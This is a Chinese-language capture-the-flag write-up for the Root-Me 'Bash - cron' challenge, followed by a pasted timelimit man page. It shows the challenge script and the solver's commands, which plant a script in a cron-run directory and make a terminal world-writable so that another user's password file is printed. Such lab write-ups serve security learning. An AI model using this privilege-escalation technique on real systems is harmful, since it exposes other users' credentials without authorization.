CTF-rootme 題解之Bash - cron

app-script-ch4@challenge02:~$ cat ch4 
#!/bin/bash

# Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4  //app-script-ch4-cracked該用戶下的任務計划為每分鍾執行一次/challenge/app-script/ch4/ch4這個腳本。
# Vous N'avez PAS à modifier la crontab(chattr +i t'façons)

# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)

# hiding stdout/stderr
exec 1>/dev/null 2>&1

wdir="cron.d/"
challdir=${0%/*}
cd "$challdir"


if [ ! -e "/tmp/._cron" ]; then
    mkdir -m 733 "/tmp/._cron"
fi

ls -1a "${wdir}" | while read task; do
    if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
        timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"  //timelimit這個命令不是很懂，但大概意思是固定的時間間隔內執行bash -p cron.d/某個腳本
    fi　　
    rm -f "${PWD}/${wdir}${task}"  
done

rm -rf cron.d/*   //每隔一分鍾清理下該目錄下的文件，本題解題時，
　　　　　　　　　需要在該目錄創建腳本，有可能我沒有完成相關操作，這個腳本就會被刪除，需要在一分鍾之內完成接題。

#!/bin/bash
if [ ! -e "/tmp/ch4" ]; then
    mkdir -m 777 "/tmp/ch4"
fi
/bin/cat /challenge/app-script/ch4/.passwd > /tmp/ch4/result.txt

app-script-ch4@challenge02:~$ set |grep "/dev/pts" |awk -F '=' '{print $2}'    查看當前ssh連接使用的終端號

/dev/pts/20

app-script-ch4@challenge02:~$ chmod o+w /dev/pts/20     將當前終端的寫權限賦予其他用戶，即app-script-ch4-cracked

app-script-ch4@challenge02:~$ vi cron.d/1.sh

#!/bin/bash

/bin/cat /challenge/app-script/ch4/.passwd > /dev/pts/20  

app-script-ch4@challenge02:~$ chmod o+rx cron.d/1.sh  不到一分鍾，結果就會打印在當前終端

TIMELIMIT(1) BSD General Commands Manual TIMELIMIT(1)

NAME
timelimit -- effectively limit the absolute execution time of a process

SYNOPSIS
timelimit [-pq] [-S killsig] [-s warnsig] [-T killtime] [-t warntime] command [arguments ...]

DESCRIPTION
The timelimit utility executes a given command with the supplied arguments and terminates the spawned process after a given
time with a given signal. If the process exits before the time limit has elapsed, timelimit will silently exit, too.

Options:

-p If the child process is terminated by a signal, timelimit propagates this condition, i.e. sends the same signal to
itself. This allows the program executing timelimit to determine whether the child process was terminated by a sig-
nal or actually exited with an exit code larger than 128.

-q Quiet operation - timelimit does not output diagnostic messages about signals sent to the child process.

-S killsig
Specify the number of the signal to be sent to the process killtime seconds after warntime has expired. Defaults to
9 (SIGKILL).

-s warnsig
Specify the number of the signal to be sent to the process warntime seconds after it has been started. Defaults to
15 (SIGTERM).

-T killtime
Specify the maximum execution time of the process before sending killsig after warnsig has been sent. Defaults to
120 seconds.

-t warntime
Specify the maximum execution time of the process in seconds before sending warnsig. Defaults to 3600 seconds.

On systems that support the setitimer(2) system call, the warntime and killtime values may be specified in fractional seconds
with microsecond precision.

ENVIRONMENT
KILLSIG
The killsig to use if the -S option was not specified.

KILLTIME
The killtime to use if the -T option was not specified.

WARNSIG
The warnsig to use if the -s option was not specified.

WARNTIME
The warntime to use if the -t option was not specified.

EXIT STATUS
If the child process exits normally, the timelimit utility will pass its exit code on up. If the child process is terminated
by a signal and the -p flag was not specified, the timelimit utility's exit status is 128 plus the signal number, similar to
sh(1). If the -p flag was specified, the timelimit utility will raise the signal itself so that its own parent process may
in turn reliably distinguish between a signal and a larger than 128 exit code.

In rare cases, the timelimit utility may encounter a system or user error; then, its exit status is one of the standard
sysexits(3) values:
EX_USAGE
The command-line parameters and options were incorrectly specified.

EX_SOFTWARE
The timelimit utility itself received an unexpected signal while waiting for the child process to terminate.

EX_OSERR
The timelimit utility was unable to execute the child process, wait for it to terminate, or examine its exit status.

EXAMPLES
The following examples are shown as given to the shell:

timelimit -p /usr/local/bin/rsync rsync://some.host/dir /opt/mirror

Run the rsync program to mirror a WWW or FTP site and kill it if it runs longer than 1 hour (that is 3600 seconds) with
SIGTERM. If the rsync process does not exit after receiving the SIGTERM, timelimit issues a SIGKILL 120 seconds after the
SIGTERM. If the rsync process is terminated by a signal, timelimit will itself raise this signal.

tcpserver 0 8888 timelimit -t600 -T300 /opt/services/chat/stats

Start a tcpserver(n) process listening on tcp port 8888; each client connection shall invoke an instance of an IRC statistics
tool under /opt/services/chat and kill it after 600 seconds have elapsed. If the stats process is still running after the
SIGTERM, it will be killed by a SIGKILL sent 300 seconds later.

env WARNTIME=4.99 WARNSIG=1 KILLTIME=1.000001 timelimit sh stats.sh
Start a shell script and kill it with a SIGHUP in a little under 5 seconds. If the shell gets stuck and does not respond to
the SIGHUP, kill it with the default SIGKILL just a bit over a second afterwards.

SEE ALSO
kill(1), rsync(1), signal(3), tcpserver(n)

STANDARDS
No standards documentation was harmed in the process of creating timelimit.

BUGS
Please report any bugs in timelimit to the author.

AUTHOR
The timelimit utility was conceived and written by Peter Pentchev <roam@ringlet.net> with contributions and suggestions by
Karsten W Rohrbach <karsten@rohrbach.de>, Teddy Hogeborn <teddy@fukt.bsnet.se>, and Tomasz Nowak <nowak2000@poczta.onet.pl>.